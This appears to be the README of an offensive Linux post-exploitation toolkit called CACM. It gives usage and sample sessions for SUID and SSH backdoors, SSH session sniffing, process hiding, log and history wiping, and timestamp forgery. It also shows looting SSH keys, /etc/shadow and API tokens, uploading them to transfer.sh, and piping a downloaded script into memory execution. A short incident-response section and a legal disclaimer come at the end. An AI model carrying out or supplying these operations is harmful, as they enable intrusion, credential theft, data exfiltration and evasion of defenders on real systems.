suidshell - SUID Shell Backdoor

Function: Create SUID shell backdoor for privilege escalation

ATT&CK: T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Usage:

# Create SUID shell backdoor
suidshell create /tmp/.shell

# Delete SUID shell backdoor
suidshell delete /tmp/.shell

# List existing SUID shells
suidshell list

portmux - Port Multiplexing

Function: Implement port multiplexing for covert channels on existing service ports

ATT&CK: T1090.001 (Internal Proxy)

Usage:

# Setup port multiplexing (multiplex port 22 as 4444)
portmux setup 22 4444 secret_trigger

# Activate port multiplexing
portmux activate target.com:22 secret_trigger

# Deactivate port multiplexing
portmux deactivate target.com:22 secret_trigger

# Test port multiplexing
portmux test target.com 22 secret_trigger

historydel - Command History Cleanup

Function: Delete shell command history records to remove operation traces

ATT&CK: T1070.003 (Indicator Removal: Clear Command History)

Usage:

# Delete specific line range from history
historydel 100-200

# Delete history containing specific keywords
historydel keyword "password"

# Clear entire history file
historydel clear

# Delete last N commands
historydel last 50

sshmon - SSH Monitoring and Data Transmission

Function: Monitor SSH connections and data transmission, record SSH session content

ATT&CK: T1040 (Network Sniffing)

Usage:

# Start SSH monitoring
sshmon start

# Start monitoring with custom output file
sshmon start --output /tmp/.ssh_logs

# Start encrypted monitoring
sshmon start --encrypt secret_key

# Start stealth mode monitoring
sshmon start --stealth --silent

# Check monitoring status
sshmon status

# View monitoring logs
sshmon logs

# View recent logs
sshmon logs --tail

# View raw logs
sshmon logs --raw

# Decrypt and view logs
sshmon logs --decrypt secret_key

# Stop monitoring
sshmon stop

# Clean all monitoring data
sshmon clean

Case 3: Data Collection and Stealth Exfiltration

# 1. Comprehensive credential collection
CACM> loot
[*] Collecting credentials and secrets...
[🔑] SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /root/.ssh/id_rsa (4096-bit RSA)
[🔐] Password Files:
[+] /etc/shadow (readable via sudo)
[+] /var/backups/passwd.bak
[🎫] API Keys & Tokens:
[+] /home/alice/.aws/credentials
[+] /opt/webapp/.env (DB_PASSWORD=secret123)

# 2. Advanced secret scanning
CACM> np /etc/ /home/ /opt/ | less -R
[🔍] Advanced scanning with Chinese support...
[+] /etc/mysql/my.cnf: password = mysql_secret_2024
[+] /home/bob/.bashrc: export API_KEY=sk-1234567890abcdef
[+] /opt/app/config.ini: 数据库密码 = chinese_secret_123

# 3. Search for specific files
CACM> find_subdomains company.com /var/log /etc
[+] Found in /etc/nginx/sites-available/default:
    api.company.com
    admin.company.com
    internal.company.com

# 4. Search for sensitive information
CACM> hgrep password /var/log/ /etc/ /home/
[📁] /var/log/mysql/error.log
   Line 245: Access denied for user 'backup'@'localhost' (using password: YES)
[📁] /etc/apache2/.htpasswd
   Line 1: admin:$apr1$xyz$encrypted_password_hash

# 5. Encrypt sensitive data
CACM> enc /home/alice/.ssh/id_rsa
[*] Encrypting with AES-256-GCM...
[+] Encrypted: /home/alice/.ssh/id_rsa.enc
CACM> enc /etc/shadow
[*] Encrypting system file...
[+] Encrypted: /tmp/.shadow.enc

# 6. Stealth data exfiltration
CACM> transfer /tmp/.shadow.enc --service transfer.sh --encrypt
[*] Double-encrypting for transfer...
[*] Uploading via transfer.sh...
[+] Upload successful!
[*] URL: https://transfer.sh/abc123/encrypted_data
[*] Auto-expires in: 14 days

# 7. Clean up traces
CACM> shred -u /home/alice/.ssh/id_rsa
[+] Original key securely deleted
CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Removed 23 lines containing attacker IP
CACM> xlog --systemd --service ssh
[*] Cleared SSH service logs (2.1MB removed)

# 8. Timestamp manipulation
CACM> notime_cp /etc/passwd /tmp/.backup_passwd
[*] Copied with full timestamp preservation
CACM> ctime /tmp/.shadow.enc
[*] Set ctime to match mtime (appears older)

Case 4: Network Proxy and Stealth Communication

# 1. Establish TCP proxy
CACM> xbounce :8080 internal.company.com:3306
[*] TCP proxy: 0.0.0.0:8080 -> internal.company.com:3306
[+] Proxy established for database access

# 2. Use ghost IP for scanning
CACM> xghostip 10.255.255.255 192.168.1.0/24 -scan
[*] Using non-existing source IP: 10.255.255.255
[*] Stealth scanning target network...
[+] Responses captured via raw sockets

# 3. Stealth SSH connection
CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected without leaving traces

# 4. Stealth file transfer
CACM> xscp --stealth /tmp/tools.tar.gz [email protected]:/tmp/.cache/
[*] Stealth SCP transfer initiated...
[*] Transfer completed: 15.2MB in 3.2s
[*] No logs generated on target system

# 5. Memory execution of tools
CACM> dl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | memexec
[*] Downloading linpeas.sh...
[*] Executing directly in memory...
[*] No disk artifacts created
[+] Memory execution completed

Case 5: Advanced Anti-Forensics Techniques

# 1. Timestamp manipulation
CACM> notime /etc/passwd "touch /tmp/backdoor.sh"
[*] Executing at /etc/passwd timestamp...
[*] System time: 2024-01-10 08:30:15
[+] Backdoor created with legitimate timestamp

# 2. Comprehensive log cleaning
CACM> xlog /var/log/auth.log "Failed password.*192\.168\.1\.100"
[*] Removing failed login attempts...
[+] Cleaned 15 authentication failures

CACM> xlog /var/log/apache2/access.log "192\.168\.1\.100"
[*] Removing web access logs...
[+] Cleaned 234 access log entries

CACM> xlog --systemd --since "2024-01-15 10:00:00"
[*] Clearing recent systemd logs...
[+] Removed 5.2MB of recent system logs

# 3. Secure file deletion
CACM> shred -n 7 -u /tmp/sensitive_data.txt
[*] 7-pass secure deletion...
[+] File completely unrecoverable

# 4. Process hiding verification
CACM> hide status
[*] Hidden processes:
  PID: 15234 - socat (hidden from: ps, top, htop, pgrep)
  PID: 16789 - nc (hidden from: ps, top, htop, pgrep)
[+] 2 processes successfully hidden

📋 Complete Command Reference

Information Gathering

Command	Function	ATT&CK	Example
`sub`	Subdomain discovery	T1590.005	`sub example.com`
`ws`	System information collection	T1082	`ws -v -o info.txt`
`scan`	Port scanning	T1046	`scan 192.168.1.0/24 -p 22,80,443`
`dns`	DNS queries	T1590.005	`dns example.com MX`
`rdns`	Reverse DNS queries	T1590.005	`rdns 192.168.1.0/24`
`xpty`	Terminal user discovery	T1033	`xpty -v`
`edr`	Security product detection	T1518.001	`edr --type av`

File Operations

Command	Function	ATT&CK	Example
`wfind`	Writable directory discovery	T1083	`wfind /tmp /var`
`hgrep`	Advanced text search	T1083	`hgrep password /etc/`
`find_subdomains`	Subdomain file search	T1083	`find_subdomains company.com`
`enc`	File encryption	T1027	`enc secret.txt`
`dec`	File decryption	T1027	`dec secret.txt.enc`
`shred`	Secure deletion	T1070.004	`shred -u sensitive.txt`
`np`	Advanced secret scanner	T1552.001	`np /etc/ \| less -R`
`loot`	Credential collection	T1552.001	`loot --passwords`

Network Tools

Command	Function	ATT&CK	Example
`dl`	Multi-protocol download	T1071.001	`dl https://example.com/file.txt`
`xbounce`	TCP traffic forwarding	T1090.001	`xbounce :8080 target.com:80`
`xghostip`	Ghost IP operations	T1090.003	`xghostip 10.0.0.1 target.com`
`xssh`	Stealth SSH connection	T1021.004	`xssh user@host --stealth`
`xscp`	Stealth file transfer	T1021.004	`xscp --stealth file.txt user@host:/tmp/`
`transfer`	File upload service	T1041	`transfer file.txt --service transfer.sh`

Process Management

Command	Function	ATT&CK	Example
`hide`	Process hiding	T1055	`hide 1234`
`tit`	User input monitoring	T1056.001	`tit read 1234`
`memexec`	Memory execution	T1055	`memexec /usr/bin/id`
`xsu`	User switching	T1134.001	`xsu root "id"`

System Persistence

Command	Function	ATT&CK	Example
`xhome`	Hidden working directory	T1564.001	`xhome /tmp/.workspace`
`xtmux`	Hidden tmux sessions	T1564.001	`xtmux new -s hidden`
`bin`	Tool download	T1105	`bin nmap curl jq`
`lpe`	Privilege escalation detection	T1068	`lpe --fast`
`ssh_backdoor`	SSH backdoor user	T1136.001	`ssh_backdoor create backup_user`
`suidshell`	SUID shell backdoor	T1548.001	`suidshell create /tmp/.shell`
`portmux`	Port multiplexing	T1090.001	`portmux setup 22 4444`
`sshmon`	SSH monitoring	T1040	`sshmon start`

Timestamp Operations

Command	Function	ATT&CK	Example
`notime`	Timestamp disguised execution	T1070.006	`notime /etc/passwd "touch file"`
`ctime`	Modify creation time	T1070.006	`ctime /tmp/file`
`notime_cp`	Timestamp preserving copy	T1070.006	`notime_cp source.txt dest.txt`

Log Cleaning

Command	Function	ATT&CK	Example
`xlog`	Log cleaning	T1070.003	`xlog /var/log/auth.log "pattern"`
`historydel`	Command history cleanup	T1070.003	`historydel 100-200`

Utility Tools

Command	Function	ATT&CK	Example
`common`	Common command collection	T1083	`common lt /var/log`

🔧 Environment Configuration

HS_TOKEN - Encryption Key

# Set encryption key
export HS_TOKEN="your_secret_key_here"

# Use environment variable for encryption
echo "sensitive data" | enc

# Use environment variable for decryption
cat encrypted_file.enc | dec

CACM_HOME - Working Directory

# Set CACM working directory
export CACM_HOME="/tmp/.cacm_workspace"

# Tool will automatically use this directory for temporary files

⚠️ Important Considerations

1. Legal Usage

Authorized Testing Only: This tool is for authorized penetration testing and security research only
Comply with Laws: Strictly comply with local laws and regulations, do not use for illegal activities
Obtain Clear Authorization: Must obtain clear written authorization from target system owners before use
Document Testing Activities: Recommend detailed documentation of all testing activities for analysis and reporting

2. Permission Requirements

Root Permission Functions: The following functions require root permissions
- notime - Timestamp disguised execution
- ctime - Modify file creation time
- notime_cp - Complete timestamp copying
- hide - Process hiding (some functions)
- xlog --systemd - systemd log cleaning
Regular User Functions: Most functions can run under regular user permissions
Privilege Escalation: Use lpe command to detect privilege escalation opportunities

3. Environment Compatibility

Primary Support: Linux systems (Ubuntu, CentOS, Debian, RHEL, etc.)
Partial Support: macOS (some functions may be limited)
Not Supported: Windows systems (recommend using WSL)
Architecture Support: x86_64, ARM64

4. Detection Evasion

Stealth Mode: Most commands provide stealth options (such as --stealth)
Process Hiding: hide command can hide critical processes
Log Cleaning: xlog command can clean operation traces
Timestamp Manipulation: Timestamp operation commands can disguise file creation time
⚠️ Note: Cannot guarantee 100% stealth, advanced EDR may still detect

5. Data Security

Encryption Strength: Uses AES-256-GCM encryption algorithm
Key Management: Properly manage HS_TOKEN environment variable
Key Loss: Lost keys will make encrypted data unrecoverable
Secure Deletion: Use shred command to securely delete sensitive files

6. Network Security

Proxy Usage: Recommend using proxy or VPN for network functions
Traffic Encryption: Use encrypted protocols for network transmission when possible
IP Spoofing: Can use xghostip for IP address spoofing
Connection Stealth: SSH/SCP commands provide stealth connection options

7. Performance Impact

Resource Consumption: Some functions (like large-scale scanning) may consume significant system resources
Network Bandwidth: File transfer and download functions will occupy network bandwidth
Disk Space: Tool downloads and logging require sufficient disk space
Recommendation: Verify performance impact in test environment first

8. Troubleshooting

Permission Errors: Check if you have sufficient permissions to execute specific functions
Network Issues: Confirm network connection and firewall settings
Missing Dependencies: Some functions may require system dependency packages
Version Compatibility: Ensure system version is compatible with the tool

🚨 Incident Response Guide

Detecting CACM Tool Usage

If you are a system administrator or security analyst, here are indicators for detecting CACM tool usage:

1. File System Indicators

# Look for suspicious hidden directories
find /tmp /dev/shm -name ".*" -type d 2>/dev/null

# Look for suspicious binary files
find /tmp /dev/shm -name "*cacm*" -o -name "*CACM*" 2>/dev/null

# Check recently modified executable files
find /tmp /dev/shm -type f -executable -mtime -1 2>/dev/null

2. Process Monitoring

# Check suspicious processes
ps aux | grep -E "(socat|nc|ncat)" | grep -v grep

# Check hidden tmux sessions
ls -la /tmp/tmux-* 2>/dev/null

# Monitor system calls
strace -p <suspicious_pid> 2>&1 | grep -E "(ptrace|process_vm_readv)"

3. Network Monitoring

# Check suspicious network connections
netstat -tulpn | grep -E ":(4444|8080|1080)"

# Monitor DNS queries
tcpdump -i any port 53 | grep -E "(crt\.sh|ip\.thc\.org)"

# Check proxy connections
lsof -i | grep -E "(LISTEN|ESTABLISHED)" | grep -v ":22\|:80\|:443"

4. Log Analysis

# Check authentication log anomalies
grep -E "(Failed password|Invalid user)" /var/log/auth.log | tail -20

# Check system log time anomalies
journalctl --since "1 hour ago" | grep -E "(time|clock)"

# Check file access logs
ausearch -f /etc/passwd -f /etc/shadow 2>/dev/null

Cleanup and Recovery

# Terminate suspicious processes
pkill -f "socat\|nc\|ncat"

# Clean temporary files
rm -rf /tmp/.*cacm* /dev/shm/.*workspace* 2>/dev/null

# Restore system time (if modified)
ntpdate -s time.nist.gov

# Reset file permissions
chmod 644 /etc/passwd /etc/group
chmod 600 /etc/shadow

📚 References

Official Resources

Security Frameworks

Technical Documentation

Related Tools

Learning Resources

🤝 Contributing

Reporting Issues

Create an Issue on GitHub
Describe the problem and reproduction steps in detail
Provide system environment information
Attach relevant logs or screenshots

Feature Suggestions

Check if similar suggestions already exist
Describe feature requirements in detail
Explain use cases and value
Consider security and compliance implications

Code Contributions

Fork the project repository
Create a feature branch
Write code and tests
Submit a Pull Request
Wait for code review

📄 License

This project is licensed under the MIT License. See the LICENSE file for details.

🔒 Disclaimer

Important Notice:

Legal Use: This tool is for security research and authorized penetration testing only
User Responsibility: Users are fully responsible for their actions and legal consequences
Developer Disclaimer: Developers assume no legal responsibility for misuse or abuse of this tool
Authorization Required: Must obtain clear written authorization from target system owners before use
Educational Purpose: This tool is primarily for security education and defense capability improvement

By using this tool, you acknowledge that you have read, understood, and agree to comply with the above terms.

Last updated on: July 28, 2025 Version: v1.0 Author: RuoJi6